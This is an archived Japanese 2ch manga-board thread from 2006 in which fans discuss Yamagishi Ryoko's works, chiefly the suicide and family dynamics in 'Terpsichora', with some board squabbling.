5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

山岸凉子総合 その2

1 :名無しんぼ@お腹いっぱい:2006/08/09(水) 18:48:28 ID:9g9GRaKL0
短編から長編まで。山岸作品の総合スレです。
過去作品を中心に現在連載中の作品まで。注意&関連スレ>>2-

前スレ
〓山岸凉子 Part80〓
http://comic6.2ch.net/test/read.cgi/comic/1150383333/


2 :名無しんぼ@お腹いっぱい:2006/08/09(水) 18:49:23 ID:XHm3OCCj0
/: : : :l     ∨: : : : : : :ト : ヘ     \: ; : l \
: : : : :./>,,_   ヽ: : : : : : : lヽ:ヘ    _,, -: : :.l .ミ
l: /l: :/ rニ≧‐_、ヽ: ヽ: ヽ: キ ヽヘ r=≦ニミ、ヽ: l レ
l:.l l:./.〃/ヽ::::::ヽヽ`\ヘヽ`、ヽ'"〃 ヽ:::::::ヽ`、ヽ:l _,
l:l、レ 《 l ノo:::::l:::l   \     l ノo::::)::l .》 リ/
.リ〈l   ヽヽ::::'::ノ         弋::`:::´:ノ   l )   ファンダヴェーレ最強の騎士、赤>>2きんが2ゲット!
\_.l    `.~.´           ` ~ ´    .l -'"       りんごは肉じゃがだけ作ってろ!
\ _.l           l            l_ /      いばらも白雪もイラネ、1・2・3じゅ〜すぃ〜
: : : : :l          _ ,,, _          /: : : :
ヘ: : : :ヽ、                   /: : : :/
 \: : : : "- .,,             ,, ‐'': : : :/
'' - ,,"_-__   ~ .i ‐ ,,    _ ,,  ‐ '': : : :__-'',, -‐ ''
      " ‐- ,, |   ~~    .|,, -‐ ''

>1ばら姫     寝起きが悪い?永眠してろwwww
>3ドリヨン     ババァが出る番組じゃねーんだよ!(プゲラ
>4ら雪姫      あれ?人気最下位の白雪さん、まだいたの(^^;
りん>5       草太に相手にされないかわいそーな女(藁
ヴァ>6       狼族の末裔?犬の間違いでしょ(プゲラッチョ
>7イトメアリアン 毎回毎回やられ役お疲れ様www
>8ーメルン    あたしを陰から守る?ストーカーとかやめてよね(プゲラ
>9ュピ       喋れないの?メップルミップルの方がよかったなぁ(グリムプゲラー
グレー>10ル   裸エプロンでファンに媚び過ぎなんだよwwww

3 :名無しんぼ@お腹いっぱい:2006/08/09(水) 18:50:02 ID:9g9GRaKL0
・次スレは970。流れの速いときは950でお願いします。
 立てられない場合は報告、次の人がスレ立てに行くこと
・連載作品ネタバレは発売日0時解禁。
 ネタバレが嫌な人は発売日前後は見ないことをお奨めします。
  発売日前にネタバレ話をしたい人は少女漫画板で。
・自分語りや"うちの子"ネタ、チャット禁止。
・煽り、荒らし、クレクレ、age厨はスルー 荒らしの相手も荒らしです。スルーか各自でNG登録。

関連スレ
日出処の天子 第ニ十一戦目
http://comic6.2ch.net/test/read.cgi/rcomic/1152058398/
山岸バレエマンガを崇拝するところ[3巻目]
http://hobby8.2ch.net/test/read.cgi/dance/1151992616/
〓山岸凉子 Part101〓
http://comic6.2ch.net/test/read.cgi/gcomic/1155085195/

4 :名無しんぼ@お腹いっぱい:2006/08/09(水) 19:23:17 ID:TUl1lMXT0
1乙〜。
ほんと少女漫画板のは速いなwww

5 :名無しんぼ@お腹いっぱい:2006/08/09(水) 19:33:48 ID:t72WRh8UO
>>1さん
乙です
敏速なスレ立てありがとうございます

6 :名無しんぼ@お腹いっぱい:2006/08/10(木) 01:01:59 ID:6ij04HEZ0
>1さん、乙です!ありがと〜

7 :名無しんぼ@お腹いっぱい:2006/08/10(木) 01:39:00 ID:60toRP45O
少女漫画板は早すぎて見てらんない。

こっちはマッタリとしてていいね。


>>1

8 :名無しんぼ@お腹いっぱい:2006/08/10(木) 09:37:23 ID:60+a60ii0
>>1さん乙です〜。

昨日「朱雀門」を読んだんだけど、テレプシの金子先生って、
10年位前に描いてたら「朱雀門」の春秋子さんみたいな
ビジュアルだったのかな。
この作品の主人公はちか(千夏)ちゃんで、春秋子さんにいろいろ
助言を受ける…というところとかも、なんとなくテレプシに
つながるものを感じた。

9 :名無しんぼ@お腹いっぱい:2006/08/10(木) 17:42:25 ID:2ku8HGkR0
>>1
乙〜

前スレ976

千花ちゃんは芸術家としての生をまっとうしたんだよね。
凡人には想像つかない、そういう人生もあるんだよ。くだらん外野のアレコレは関係ないl。
最後まで崇高な精神のまま死にました。追い詰められたとは言えそれは千花ちゃんが選んだんだよ。

10 :名無しんぼ@お腹いっぱい:2006/08/10(木) 17:49:22 ID:VhGDIxAv0
布都姫こそ巫女萌えの原点

11 :名無しんぼ@お腹いっぱい:2006/08/10(木) 17:54:55 ID:/CIEMwnv0
布都姫は年上巫女様なのに年下にベタ惚れちゃうのにギャップ萌え。
ところてん読者には嫌われているが布都結構好きだ。

12 :名無しんぼ@お腹いっぱい:2006/08/10(木) 18:08:47 ID:dDyIOPMV0
自分も布津姫好きだ。
他の登場人物と同じくらいに。
毛人に感情移入して読んでたなぁ。
彼のまっとうな感性が好き。
馬子パパンも入鹿も好きだけれども。

13 :名無しんぼ@お腹いっぱい:2006/08/10(木) 19:18:27 ID:oCdemd0wO
処天スレはたまに覗くけど、いつも楽しそうだよね
リアル連載時に2ちゃんがなかったから語り尽くせないことがたくさんあるのか、繁盛もしてるし

14 :名無しんぼ@お腹いっぱい:2006/08/10(木) 20:02:01 ID:GU07f+DZ0
巫女つーか、霊能者繋がりですが
白眼子さま萌え。特に光子との繋がりがいい。
親子でもなく恋人でもない不思議な関係が好きだ。

15 :名無しんぼ@お腹いっぱい:2006/08/10(木) 21:17:03 ID:za5dsWOJ0
白眼子様いいね。笑顔がなかなか可愛い。
山岸さんの作品ということで構えながら読んだが、最後までいい人で良かった。
青青のシビも最後までいいやつだったなあ。
山岸さんの作中人物で、この2人は安心できる大人って感じがした。

16 :名無しんぼ@お腹いっぱい:2006/08/11(金) 00:11:16 ID:H2e8JFw90
白眼子といえば、光子のホクロが悪運の相、とかいっていたが、
あれが特徴となって親戚が探しに来ることを読んでいたんだね?

17 :名無しんぼ@お腹いっぱい:2006/08/11(金) 00:27:30 ID:LVYiNDxr0
あの作品は出てくる人、みんな良い人だよね。別に人物描写が薄っぺらいわけでなく。
地味な主人公だけど、まっとうに生きることが大切だと当たり前のことを教えてくれる。
あんなかんじの作品をもっと読みたいね。

18 :名無しんぼ@お腹いっぱい:2006/08/11(金) 01:11:58 ID:AtpTZXrC0
珍しくっていったらあれだけど読後感が爽やかだった。

19 :名無しんぼ@お腹いっぱい:2006/08/11(金) 03:22:42 ID:Zu7xMyIr0
割合ここ数年は明るい話を書いてくれるよね。…多分。

20 :名無しんぼ@お腹いっぱい:2006/08/11(金) 09:56:06 ID:FtG4MjzjO
最近から山岸先生の作品を読みはじめました。今後ともよろしく。

ところで質問なのですが、「コスモス」の話の内容って、母親が子供達に暗示をかけて、喘息の発作を起こさせて父親を家に留まらせようとする話、として読めばいいのでしょうか?
ご教授お願いしまする。

21 :名無しんぼ@お腹いっぱい:2006/08/11(金) 10:01:07 ID:FtG4MjzjO
ぬぁ、
×子供達に
〇子供に

です・・・間違いスマソ。

22 :名無しんぼ@お腹いっぱい:2006/08/11(金) 11:31:59 ID:EOzNjhyP0
>>20
それでおk

もともと小児喘息の発作は、精神的なものの影響で起きることが
多いからね(もちろんそうでない患者もいるけど)。

遊びなんかに夢中になってるときは何でもないのに、親とかが
「そういえば○○ちゃん、発作は大丈夫?」と思い出させたりすると、
とたんに発作が起きたり、とかよくあるらしい。

23 :名無しんぼ@お腹いっぱい:2006/08/11(金) 11:43:05 ID:IfdZZAEB0
精神って要は脳だし、脳も肉体の一部で全臓器とつながってるんだもんね。

24 :名無しんぼ@お腹いっぱい:2006/08/11(金) 11:50:55 ID:kGrPXQ/E0
「コスモス」母って、夫に帰ってほしいという思いから、
無意識に息子に喘息のこと口にして発作を起こさせて
しまうんじゃなくて、発作を起こさせるためにわざと
喘息のこと言ってる?
あの手の込んだ手作り弁当も、
発作のたびの介護のきりきり舞いも、
夫を呼び寄せるために発作を起こさせてる
我が子への贖罪のつもりのような気がする。

25 :名無しんぼ@お腹いっぱい:2006/08/11(金) 11:55:34 ID:kGrPXQ/E0
我が子への贖罪というより、
我が子に警戒心持たせないための取り繕いかもと思って
自分でゾーッとしてしまった・・・。

26 :名無しんぼ@お腹いっぱい:2006/08/11(金) 12:01:19 ID:kGrPXQ/E0
ところでテレプシの今月号を読んだ。
「バイ」という毛箱の目に狂気が宿ってて怖い。
岩笛で孫に笛吹くようにそそのかしたときのお祖母ちゃんみたい。

27 :名無しんぼ@お腹いっぱい:2006/08/11(金) 12:13:40 ID:FtG4MjzjO
早速のレス、ありがとうございます。

子供の視点で描かれている為か、なかなか先に挙げた答には至らず(単純に読解力が足らないだけなのですが)、非常に奥の深い作品だなぁと思いました。
また、>>24さんのレスにあった、母親の贖罪の描写も併せて読むと、より違った視点で読めそうですね。

にしても、短編なのに深い作品が多いですよね・・・前のレスにあった「白眼子」とか、「鬼」とか。

28 :名無しんぼ@お腹いっぱい:2006/08/11(金) 12:31:22 ID:FtG4MjzjO
くぅ、>>25さんのレスを見逃してしまった・・・orz

その状況で読むと、暗示と言うより呪詛のような暗くドロドロとした感じになって、ラストの1コマがさらに・・・ガクブル

29 :名無しんぼ@お腹いっぱい:2006/08/11(金) 13:23:03 ID:KhonFvtC0
>26恐かったね
千花の周辺に出没していた悪意に満ちた人物だと
ユキちゃんが感づいたことを、瞬時に察知してのバス飛び乗り
その俊敏さが恐い

「バイ」って級友だけじゃなくユキにも言ったのかな?
もしそうだとしたら安全なところ(バス)で
「そうだよあたしだよ 残念だねバーカ」
みたいな意味で不敵な顔見せしたってことになり
さらに恐いが…

30 :名無しんぼ@お腹いっぱい:2006/08/11(金) 14:38:50 ID:LdrfVccx0
この「バイ」は、正解って意味もあるような。(ex「バイ!千花」)
疑惑が確定になった瞬間。

しかし行き先の違うバスからどうやって自宅へ?
と、余計なこと考えてしまった。
「すいません、バス間違えて」とタダ乗りを見逃してもらう?
バスを適当なところで降りて、最寄の駅から帰る?これかな?
六花がまだいるかもしれないからユーターンはないだろうな。

31 :30:2006/08/11(金) 14:41:58 ID:LdrfVccx0
ああ、つまり六花に言ったのではなく、
犯人だと読者にわからせるため、って意味。

32 :名無しんぼ@お腹いっぱい:2006/08/11(金) 15:04:48 ID:rNqk+fQ70
いじめをしてる子って、ああいうあっけらかんとした感じが多いんだろうか。
自分なら「もしかして私のせいで自殺…?」とか考えて、怖くて仕方なくなると
思うんだけど。
良心の呵責というか、人一人死なせてしまったことへの後悔とか、相手の
自分への恨みつらみとかね。

33 :名無しんぼ@お腹いっぱい:2006/08/11(金) 15:21:09 ID:LdrfVccx0
「だってあの子が悪いのよ」と、一種の正義感で、
自分の感情が傷つかないように思考してると思う。

34 :名無しんぼ@お腹いっぱい:2006/08/11(金) 15:22:59 ID:KhonFvtC0
さんざんいじめた子の弔問にクラス代表でくるようなタマだ。
キャラの使い分けは先生の前では完璧にできるんだろうな。


35 :名無しんぼ@お腹いっぱい:2006/08/11(金) 15:23:41 ID:LdrfVccx0
あと、「みんなもやってるもん」と。
集団心理で責任感が薄れ、気が大きくなる。

36 :名無しんぼ@お腹いっぱい:2006/08/11(金) 15:26:11 ID:J+KTxJ1y0
>>30
前半同意。


>バスを適当なところで降りて、最寄の駅から帰る?これかな?
これだと思う。
大体バスじゃなくて電車で帰るつもりだったんだし。
超どうでもいい疑問だけどw

37 :名無しんぼ@お腹いっぱい:2006/08/11(金) 15:40:40 ID:KhonFvtC0
あの先生って人間相手の仕事なのに
人間を何もみていないんだな。
自殺しても「あの子が?まさか…オロオロ」
この先高森の悪事がばれてもたぶん「あの子が?まさか…オロオロ」

そもそも自分のひいきでイジメが始まったこともいつ気がつくやら
「オ、俺が?まさか…オロオロ」
鈍すぎる善人は悪人だ。

38 :32:2006/08/11(金) 15:50:21 ID:LUY/5WdT0
ふーん、そんなものなんだ。
口げんかした相手が泣き出しただけで後味悪くてやり切れないような小心者の私には、
やっぱりいじめっ子の心理が理解できないみたい。
でも、そんな子が自分の身近にいたら、とても怖い…。

39 :名無しんぼ@お腹いっぱい:2006/08/11(金) 17:24:20 ID:SAd2bzO5O
>>29
あれはもちろん、ユキに言ったものと思うけど、読者サービスwのようなものかとも思ったよ
バイ!チカのセリフはチカと読者しか知らないわけで
読者には、あれで毛箱の正体バッチリだし、言葉の使い方違ってるかもしれないけど、ある種カタルシスみたいなん得るよね
バイ!キターーーみたいなw

40 :名無しんぼ@お腹いっぱい:2006/08/11(金) 17:59:07 ID:qARE/4Xg0
【跛】のバレリーナ

びっこでも生きていて欲しかった

41 :名無しんぼ@お腹いっぱい:2006/08/11(金) 18:38:51 ID:1uPMb7V/0
バレリーナじゃなくなってもいいから生きてて欲しかった。

42 :名無しんぼ@お腹いっぱい:2006/08/11(金) 20:03:11 ID:t50p5w2n0
>>38
>>33-35じゃないけど、
いじめっ子でなくても、いじめっ子の類を見ていれば想像がつくってこと。
「良心を持たない人たち」という本もあったりするくらいで、
自己愛が強いと、自分の思い通りで自分が優位にあるのが正しいあり方となってしまうから、
自分に邪魔な人間こそ悪で、気に入らないことも人のせいで、
それういう相手に危害を加えることも認められると解釈してしまう。
つるんでいる仲間もたいてい自分の味方をする発言をしてくれる。<集団心理
でも、自殺にまで至るとさすがに後ろめたくなるかもしれないけど、
毛箱は自己正当化してるどころか、千花の死を喜んでいたりして…。

一旦元気になった千花ちゃんが、「鬱は治りかけは危険」よろしく
飛び降りる直前に、そのきっかけとなる何かが毛箱とあったのかな。


43 :名無しんぼ@お腹いっぱい:2006/08/11(金) 20:12:29 ID:9A+JTqwX0
ビルを眺めていたとき(「何を考えているのチカちゃん」のとこ)
には覚悟を決めてたと思う。
自殺の動機に関しては、ケバコの%は低いね。
踊れていたら、ガマンできていたと思うから。

ケバコが在日だとしたら、かの国で手術をしたのは、
もう何かの呪いとしかw

44 :名無しんぼ@お腹いっぱい:2006/08/11(金) 20:33:23 ID:t50p5w2n0
「お祖母ちゃんが死んではいけないと言ったような気がしたけど、
それでもビルを眺めている時に自殺を考えていて、でも暫く元気な素振りを見せていたか、
それとも夜歩きしている時に飛び降り自殺について考えていて、
祖母の言葉で自殺を思いとどまりながらビルを眺めていて、
でも学校での出来事か何かがきっかけになって、思い余って自殺したのか。

千花が自殺した一番の心理的原因は、バレリーナとしての人生以外はない
と思い、でも怪我や手術の失敗でそれが困難になったことだけど、
毛箱の言葉が、そういう千花の精神状態への大きなブローとなったり、
思い詰めさせてもいる。毛箱の言葉や虐めが、千花を焦らせてもいた。

45 :名無しんぼ@お腹いっぱい:2006/08/11(金) 20:56:41 ID:J+KTxJ1y0
>>44
後者だと思う。
「おばあちゃんが死んではいけないとry」の台詞と
あの時のあの表情に嘘はないと思う。

一度は踏みとどまって、回復した様に見えたけど、
治りかけで何かのきっかけが来てリバウンドが来たって感じじゃないだろうか。

46 :名無しんぼ@お腹いっぱい:2006/08/11(金) 21:19:01 ID:f2LA3sTj0
篠原家って常識的な家だから
最初の頃はこんな展開になるなんて思わなかった。
バレエにしても金銭感覚にしても
相応の範囲でやってたのにね。
バレエ教師の子だからってバレエを強要せず
たまに贅沢しても当たり前だと思わせないとか。
千花の怪我で借金して手術だ、医師になるのは逃げとか
千恵子さん人が変わってしまって必死だったもんね。
娘がバレエで大成することが密かな願望にあっても
表に出さずにやってきたのに。

47 :名無しんぼ@お腹いっぱい:2006/08/11(金) 21:29:30 ID:t50p5w2n0
千花ちゃんがバレコン、くるみ割で成果を出してしまったから、
ローザンヌや大きな夢を抱いてもおかしくなくなり、また諦めきれない状況となったのかな?

48 :名無しんぼ@お腹いっぱい:2006/08/11(金) 21:36:37 ID:FF3KuMqo0
こんご高森が自己正当化を期して2ちゃんに書きまくり
高森擁護自演バレ
本人しか知りえないコア情報ポロリ
篠原家名誉毀損
…などなどのボロを出しますように!ナムナム

49 :名無しんぼ@お腹いっぱい:2006/08/11(金) 21:44:45 ID:sMznmfB90
このまま高森がのうのうと生きていくのは耐えられない。
陰湿ないまどきのいじめっこの現実はそうだと言われても、
苦しくて悔しくてたまらない。
何かしらのカタルシスが欲しい。
ないの?
ないのか?

50 :名無しんぼ@お腹いっぱい:2006/08/11(金) 21:57:02 ID:J+KTxJ1y0
正直自分は高森がどうなろうと興味はない。
そんなことで今更カタルシスは感じられないよ。

51 :名無しんぼ@お腹いっぱい:2006/08/11(金) 22:14:22 ID:sMznmfB90
>>50
あんたはそうでも私は違う。
何らかのカタルシスは欲しい。作者が描いてくれると期待してもいないが。

52 :名無しんぼ@お腹いっぱい:2006/08/11(金) 22:17:49 ID:ow1f8m2r0
私も49=51に同感だな。
このままじゃあまりに辛い…。

53 :名無しんぼ@お腹いっぱい:2006/08/11(金) 22:21:24 ID:pP4tgc6+O
私もいらない派。作者が描くとも思えないし。
まー人それぞれだけどね。

54 :名無しんぼ@お腹いっぱい:2006/08/11(金) 22:23:33 ID:m+baGJcP0
多分、六花が振付けるであろう「トウォネラの白鳥」は千花のための踊りになり、
千花の死に捧げられるだろう。
そうやって昇華させることが、読者へのカタルシスになるんだろうな。

55 :名無しんぼ@お腹いっぱい:2006/08/11(金) 22:27:40 ID:t50p5w2n0
表面的にうまく行っているように見えようと、高森の人生や生き方は
おおよそいい生き方とは言えない。ああいう人間として生まれたことが高森の最大の不幸です。

56 :名無しんぼ@お腹いっぱい:2006/08/11(金) 22:53:26 ID:YXfkGVwZ0
そういうカタルシスが欲しい人のためにも、
必殺仕置き人シリーズは必要だったね。
今ならビッグコミック連載のダブルフェイスとかがそれかな。
でもテレプシはそういう漫画でねーし。

57 :名無しんぼ@お腹いっぱい:2006/08/11(金) 22:58:05 ID:1uPMb7V/0
>>54
私もそっち系のカタルシスが欲しい。
まぁ、けど、ユキちゃんが振付師として名をはせたとき
『私の全ての踊りは、私のテレプシコーラである亡き姉に捧げられています』
とか言って、後年すさみきった毛羽子舌打ち、程度の描写は欲しいのも
正直なところだけどね!

58 :名無しんぼ@お腹いっぱい:2006/08/11(金) 23:46:54 ID:5E3rmsx10
鬼子母神読み返したら双子の兄の名前が出てこないことに気がついた。
最初から最後まで「お兄ちゃん」って呼ばれてるんだね。


59 :名無しんぼ@お腹いっぱい:2006/08/12(土) 00:05:09 ID:LVYiNDxr0
私も高森のことはいいや。もし自分だったらあんなやつに負けて自殺なんてありえない。
あんなのに負けたなんて千花ちゃんの名を汚す気がしてやだ。
やっぱりバレエ以外の道がなかったのが原因だもの。

60 :名無しんぼ@お腹いっぱい:2006/08/12(土) 00:14:32 ID:F+1Cvc7H0
じゃあもう読むのやめたら。

61 :名無しんぼ@お腹いっぱい:2006/08/12(土) 00:43:46 ID:XdIRlhdS0
>>46
>千恵子さん人が変わってしまって必死だったもんね。

そうだったと思う。ネットで中傷されてチカがせっかく家で大泣きした時の
「手術は成功しているのに!」の時の目なんてイッちゃってた。
                (↑こういうの描くのはギシ先生流石に上手い)
でも、だって現に治ってないでしょうが…と、読者はすぐに突っ込み入れてたのに。

62 :名無しんぼ@お腹いっぱい:2006/08/12(土) 01:29:00 ID:UliABnpp0
千花ちゃんについて、言いたいことがある。

千花ちゃんって、皆さんの評価を見てみると

「いい子」
「がんばりやさん」
「まじめ」
「完璧主義な性格」
「しっかりもの」

大体こんな感じのイメージや評価に落ち着いているみたいだけど。




本当にそうだったのか?

63 :名無しんぼ@お腹いっぱい:2006/08/12(土) 01:42:11 ID:0OumduCp0
プラスは大体そうなんじゃないかな。マイナスももちろんあるよ。
譲らない性情や時々人の気持ちを考えずに正論を言っちゃう点とか。
一番上の「いい子」が範囲広すぎる、とは思うな。

64 :62:2006/08/12(土) 02:00:12 ID:UliABnpp0
そもそもだ、千花ちゃんは、どうしてバレエを踊ることに
あんなに一所懸命だったのだろうか?

バレエが好きだから?ほんとに?

千花ちゃんは何の目的でバレエを踊っていたのだろうか?
憧れのプリマとなるため?


>>63
>プラスは大体そうなんじゃないかな。マイナスももちろんあるよ。

その「プラス」は、実はマイナスの裏返しだったとしたら?



千花が鏡を覗くと、そこに千花ではなく、千恵子が映ってる。
以前も、このことを話題に上げる人が時々いたけど・・・
実は、これは触れてはならないパンドラの箱なのかしら。


65 :名無しんぼ@お腹いっぱい:2006/08/12(土) 02:11:36 ID:0OumduCp0
なんだかんだで子供だから母親から誉められるのが一番嬉しい。
でもそれに加えて踊る喜びも確かに感じていたんじゃないかと思う。
これが踊る理由かな?
完全に母親の意向で踊らされていたと考えるのは残酷だから思いたくないが、アリだね。

プラスはマイナスの裏返しっつーと「まじめ=融通が利かない」みたいなもんか。
まぁ人間の性格ってそんなもん?

66 :名無しんぼ@お腹いっぱい:2006/08/12(土) 02:13:20 ID:NppYNsND0
ID:UliABnpp0がキモイのは私だけかしら。

もっとイヤな性格にいくらでも出来たキャラを、
総合評価で「やっぱりいい子だな」って感じさせる
描写にしてただけのことでしょ。


67 :名無しんぼ@お腹いっぱい:2006/08/12(土) 02:20:55 ID:0OumduCp0
キモイとか言って否定はやめていただきたいのだが。
良い面も悪い面もあるチカの性格は総合でよい子だとは私も思う。
そこに母親がどう関わっているか、とか考えてるだけじゃ。

68 :名無しんぼ@お腹いっぱい:2006/08/12(土) 02:33:36 ID:8Qcotm1y0
>>64
バレエを踊ることが好きだったんだよ。
「何の目的で」とか、
そういう次元のことではないように思うが。

69 :62:2006/08/12(土) 02:36:38 ID:UliABnpp0
>>65さん
いいとこ指摘してくれました。
>なんだかんだで子供だから母親から誉められるのが一番嬉しい。

>>58でも挙がった
「鬼子母神」という短編作品を皆さんはご存知でしょうか?
表札パパと菩薩ママと王子兄と悪魔の妹のお話。
あの王子兄と千花ちゃんがとダブっている、
そもそも、篠原一家がこの短編の延長線、ていうか、さらに深く掘り下げた
モノに見えるのは私だけ?

>>66>>67
キモくてけっこう。
ただ、「いい子」っていうのはさすがに意味が広範囲でぼやけちゃったかな。

70 :62:2006/08/12(土) 03:09:25 ID:UliABnpp0
>>68
>バレエを踊ることが好きだったんだよ。
皆さんそう思われますよね。私もそう思ってましたもん。
でも、本題はそれなんですよ。

これが、六花ちゃんだったら明瞭にに説明できるんです。
空美ちゃんと千花ちゃんの踊りを見て感動たから。

でも、千花ちゃんがバレエを踊る動機、モチベーションが
いまひとつ見えてこないんです。
見えてきたと思ったら、やっぱり千恵子なんですよね。
1,2巻を読み直してるんだけど、千恵子と千花は
ほとんど一心同体と化してる。

千花とは何者だったんだろうか?
「がんばりやさん」
「まじめ」
「完璧主義な性格」
「しっかりもの」
これらの評価が、実は千花に植えつけられた
強壮観念によるものだったとしたら?


みなさんは何をキチ○イなことを、と思われるかもしれませんが
しかし、こう考えると、ケバ子問題他、千花ちゃんに対しての
あらゆる疑問に説明がついてしまうんですよ、これが。

また明日来ます。 おやすみなさい。

71 :名無しんぼ@お腹いっぱい:2006/08/12(土) 03:40:32 ID:oQTjPz0f0
カウンセラーみたいに仕切ろうとする姿勢が、
「キモイ」んじゃないかな?
平易に書こうよw

72 :名無しんぼ@お腹いっぱい:2006/08/12(土) 03:44:48 ID:vXhh6esSO
チカは、思いやりや優しさも持ってる子だよ
別に基地外とは思わないけど、数式のように当てはめてストーリーを読むのは無粋な感じがする
キモイと思う人がいたのは、あらかじめあなたが想定している答えがあって、それを暗に他者に押し付けようとしている感じを受けたからでは
少なくとも私はそう
悪意がないのは分かるけれど…

73 :名無しんぼ@お腹いっぱい:2006/08/12(土) 04:13:08 ID:CbqKtmgW0
「鬼子母神」との類似性、あるいは千花と千恵子が
あのお兄ちゃんとママの関係に移行する可能性も
ある、っていうのも、少女漫画板にスレがあった頃から
再三言われてたことだし、今さらエラソーに「皆さんは
ご存知でしょうか」もないもんだ、というのもある。

つーか、スレに書き込むときに「皆さん」って呼びかける
タイプのレスは、大概妙に浮いてたりどっかハズしてたり
することが多いんだよなー。

74 :名無しんぼ@お腹いっぱい:2006/08/12(土) 05:17:07 ID:vcj3aCq90
>>71
カウンセラーは仕切らないけど……。

それはともかく、62が何か問題があると
「母親が悪い」と言いたいタイプの人だとはよく分かった。

75 :名無しんぼ@お腹いっぱい:2006/08/12(土) 05:44:49 ID:vXhh6esSO
早寝して目が覚めてしまったのでもう一丁
「鬼子母神」の母親と息子はお互い依存関係にあると思う
千恵子さんはチカに期待、チカもその期待に応えていたけど、母親が期待するからではなく、チカ自身がバレエを愛して、努力もしたから結果的には母の期待に応えてる
手術の最初の頃は、二人とも意識が外に向かってたけど、もう手術は嫌だ、のあたりからチカの方から千恵子さんに対して、引いた目線で見るようになってる
千恵子さんのバレエのできないチカを認めたくない、ていう気持ちを薄々感じてたし
母親への不信感は芽生えてたと思う
そこが鬼子母神とは違うとこじゃないかな
篠原家は、父親の存在感が鬼子母神一家とは違う
家事もこなすし、娘たちへの協力は惜しまないし何より純粋に公平に愛情を持ってる
何より、夫婦に信頼関係があるし
姉妹間にもお互いを思いやる愛情があったし
鬼子〜の兄は妹に対してほとんど関心すらない状態
チカと千恵子さんは人間同士として相性が良かったかもしれないけど、親子として相性が合ってたのは、ユキの方だったんじゃないかな
何かとりとめがない感じ&長文、ごめん

76 :名無しんぼ@お腹いっぱい:2006/08/12(土) 08:13:27 ID:7wdnKjiS0
母親が上の子をいつまでたっても心配し続ける
ってある意味デフォでしょ。


77 :名無しんぼ@お腹いっぱい:2006/08/12(土) 09:11:25 ID:tnyxYHx10
>>61
>チカがせっかく家で大泣きした
あれは本当に千恵子さん、どうしちゃったんだと思った。
「千花はめったに泣かない子」と解っている筈だったのに、
その千花が号泣しているあの時、これまでにないくらいダメージを受けている事に
どうして気づいてあげられなかったんだろう。

78 :名無しんぼ@お腹いっぱい:2006/08/12(土) 09:22:04 ID:F+1Cvc7H0
死んでからなら何とでも言える
ここでわいのわいのとキャラを実在の人物であるかのように
責め立ててる読者だって自殺展開とは読めてなかったろ

79 :名無しんぼ@お腹いっぱい:2006/08/12(土) 11:12:17 ID:rCziIf3o0
千花を神格化するのには疑問だけど、千花がとてもいい子というのには異存はないです。
ああいう負けん気が強くすごくプライドの高い子だと、
自己愛や競争心のあまり人のせいにしたり人の足を引っ張ったり、
歪んだ性格になったりするのもありがちだけど、千花は本当に良心的な子だった。
自分の方が母親の愛を多く得るポジションにある姉が、
妹に歪んだ優越感を抱いたり、妹を蹴落とそうとするもありがちだけど、
千花は本当にいいお姉さんだった。千花も六花も育ちが本当にいい感じ。

マイナス面は、勝ち負けの問題に捉えがちな所、他者の評価
に依存つか影響されがちな所かなあ。
そうすると物事の本質を見誤ったり、他人に対する余裕がなくなったりする。

このいい子な面とマイナス面とによって悲劇が起こってしまったけど、
もし千花がいい子でなかったら、高森のような人間になっていたりして。

80 :名無しんぼ@お腹いっぱい:2006/08/12(土) 11:21:09 ID:rCziIf3o0
母子のすれ違いは、千花だけでなく六花にもあった。
親だって完璧人間ではないから、篠原一家に限らず、
そういう行き違いや誤りによるマイナスをくぐり抜けながらも、生きていくんだろう。
確かに親の側の誤りを減らし、理想的な対応ができればいいんだけど、
またやたらと親のせいにして生きてもしょうがない。

千恵子にとって六花の良さはわかりにくく、むしろ困った子扱いで
下手すれば、六花も親に期待されない負い目をかかえて生きていたかもしれない。
でも、金子先生や理解者と本人の才能とで道が開け自分の道を行き、
今は、甘ちゃんな六花をしっかり者の千恵子がフォローするいい親子関係になった。
優等生型でない六花に千恵子が苛々する、ヒリヒリした場面もあるけど、
千恵子と六花の場面は親子らしい微笑ましさのある場面も多い。
千恵子さんと千花は、親の期待に応えられる子供、という関係が
当初は成功し、やがて裏目にっていったところかな?
先天的な類似にせよ育てられ方にせよ、千花は千恵子の産物といった感じだしなあ。

でも千恵子も千花も六花もあまり人のせいにしない所は偉いと思った。
六花は手のかかる所が迷惑かもしれないけど、逆に問題面を隠さず表に出すから
問題解決の道を得やすい。
そこから更に成長して、他人に配慮できる大人になるといいな。

81 :名無しんぼ@お腹いっぱい:2006/08/12(土) 11:38:55 ID:rCziIf3o0
>>61
千恵子が無意識のうちにも千花の厳しい状況を認めたがらなかった
いのもあるし(山岸スレの千花ファンだって、そんな感じの人達がいたように)、
大泣きする千花を庇い希望を持たせる気持ちもあったのかもよ?

「手術失敗。五千万もかけておいて親不孝だね」というネットでの中傷だったから。
いずれにしても、千恵子さんが初めて目にしたネットへの抽象の酷さと、
娘の受けているショックに、動転してたんだろうけどね。

82 :名無しんぼ@お腹いっぱい:2006/08/12(土) 12:49:59 ID:k4X0CKjkO
俺には長文でネチネチ人格攻撃してる方がキモイ
女の多い板にはありがちだけど

83 :名無しんぼ@お腹いっぱい:2006/08/12(土) 12:53:38 ID:ukbFYJ1c0
>>71
場を、誘導・コントロールしようという意図が透けて見えたので・・。

84 :名無しんぼ@お腹いっぱい:2006/08/12(土) 14:14:50 ID:tOoz89Wn0
なんだろう、自分の意見を長文で書いてる人は沢山いるのに、ID:UliABnpp0の
カキコが飛び抜けてキモイ。
他の人のは色々な解釈があることが参考になって楽しいのに。

85 :名無しんぼ@お腹いっぱい:2006/08/12(土) 14:25:08 ID:EEn6kFkX0
 千花がバレエに熱中していたのは、自分の意思というより、
 千恵子の洗脳だったんだと思う。
ですむのに、改行で大げさに展開するからでね?

86 :名無しんぼ@お腹いっぱい:2006/08/12(土) 15:02:29 ID:k4X0CKjkO
>>85
反論があるなら普通に書けばすむのに
感情的にネチネチ人格攻撃するのも同じ気持ち悪さがあるんだけど
わかってないのかね。

87 :85:2006/08/12(土) 15:10:40 ID:EEn6kFkX0
85の文章ってネチネチ人格攻撃してますか?
なぜ私にフルの?

88 :名無しんぼ@お腹いっぱい:2006/08/12(土) 15:43:54 ID:k4X0CKjkO
自覚なしか。私は悪くないって?w
まあアンタだけじゃないけどさ。客観的に見て、尻馬に乗って一人を攻撃して見えるがね。

